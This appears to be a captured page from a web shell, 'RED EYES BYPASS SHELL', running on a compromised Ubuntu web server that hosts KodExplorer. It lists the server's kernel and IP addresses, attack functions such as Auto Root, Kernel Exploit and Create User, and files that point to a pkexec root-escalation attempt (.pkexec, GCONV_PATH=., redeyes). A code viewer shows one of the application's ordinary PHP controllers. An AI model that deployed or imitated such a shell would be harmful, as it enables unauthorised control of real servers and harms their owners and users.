Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
user /
app /
controller /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
api.class.php
1.35
KB
-rw-r--r--
app.class.php
3.3
KB
-rw-r--r--
desktop.class.php
926
B
-rw-r--r--
editor.class.php
4.57
KB
-rw-r--r--
explorer.class.php
45.71
KB
-rw-r--r--
fav.class.php
1.77
KB
-rw-r--r--
pluginApp.class.php
6.01
KB
-rw-r--r--
redeyes
10.99
KB
-rwxr-xr-x
setting.class.php
3.76
KB
-rw-r--r--
share.class.php
20.3
KB
-rw-r--r--
systemGroup.class.php
8.58
KB
-rw-r--r--
systemMember.class.php
16.05
KB
-rw-r--r--
systemRole.class.php
4.85
KB
-rw-r--r--
user.class.php
21.61
KB
-rw-r--r--
userShare.class.php
3.17
KB
-rw-r--r--
utils.php
17.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.class.php
<?php /* * @link http://kodcloud.com/ * @author warlee | e-mail:kodcloud@qq.com * @copyright warlee 2014.(Shanghai)Co.,Ltd * @license http://kodcloud.com/tools/license/license.txt */ class api extends Controller{ function __construct(){ parent::__construct(); } /** * 通用文件预览方案 * image,media,cad,office,webodf,pdf,epub,swf,text * 跨域:epub,pdf,odf,[text]; * @return [type] [description] */ public function view(){ if(!isset($this->in['path'])){ show_tips('参数错误!'); } $this->checkAccessToken(); $this->setIdentify(); $this->display('view.html'); } private function setIdentify(){ if(! $_SESSION['accessPlugin'] ){ session_start(); $_SESSION['accessPlugin'] = 'ok'; session_write_close(); } } public function checkAccessToken(){ $model = $this->loadModel('Plugin'); $config = $model->getConfig('fileView'); if(!$config || !$config['apiKey']){ show_tips('fileView not open ,or apiKey is empty!'); } $timeTo = isset($this->in['timeTo'])?intval($this->in['timeTo']):''; $token = md5($config['apiKey'].$this->in['path'].$timeTo); //show_tips(array($config['apiKey'],$token,$this->in)); if($token != $this->in['token']){ show_tips('token 错误!'); } if($timeTo != '' && $timeTo <= time()){ show_tips('token已失效!'); } } }
Close